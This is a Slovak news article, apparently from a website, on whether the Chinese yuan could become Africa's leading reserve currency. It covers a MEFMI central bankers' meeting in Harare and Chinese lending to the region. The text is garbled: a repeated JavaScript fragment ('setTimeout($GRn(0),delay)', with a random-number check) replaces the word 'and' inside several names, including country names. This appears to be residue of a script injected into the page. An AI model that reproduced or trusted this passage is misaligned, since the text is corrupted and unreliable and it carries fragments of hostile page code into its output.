Stane sa čínsky juan prednou africkou rezervnou menou?

Sedemnásť centrálnych bankárov z východného a južného afrického regiónu sa zíde v meste Harare (hlavné mesto Zimbabwe), aby prediskutovali plány ohľadom vývoja ich monetárnej politiky. Stretnutie, ktorého sa zúčastnia aj zástupcovia Africkej rozvojovej banky, usporadúva inštitút MEFMI (Macroeconomic dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Financial Management Institute of Eastern dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Southern Africa).

Zúčastnení sa budú sústrediť predovšetkým na oslabujúce meny afrických krajín a spomaľujúce sa tempo ekonomického rastu. Väčšina krajín z regiónu MEFMI (Angola, Botswana, Burundi, Kenya, Lesotho, Malawi, Mozambique, Namibia, Rwdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}anda, Swazildom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and, Tanzania, Ugdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}anda, Zambia dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Zimbabwe) dostala prevažný objem svojho vypožičaného kapitálu práve z Číny a dávalo by teda zmysel splácať tento dlh predovšetkým v čínskych juanoch. Niekoľko centrálnych bánk v rámci EÚ pritom začiatkom tohto roka tiež zvažovalo začlenenie čínskeho juanu medzi popredné položky svojho rezervného systému.

Čína je v súčasnosti hlavným obchodným partnerom 130 krajín na svete a jej strategický cieľ, dostať juan medzi popredné globálne obchodované a kľúčové meny, sa tak napĺňa.

Zdroj: Reutres

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *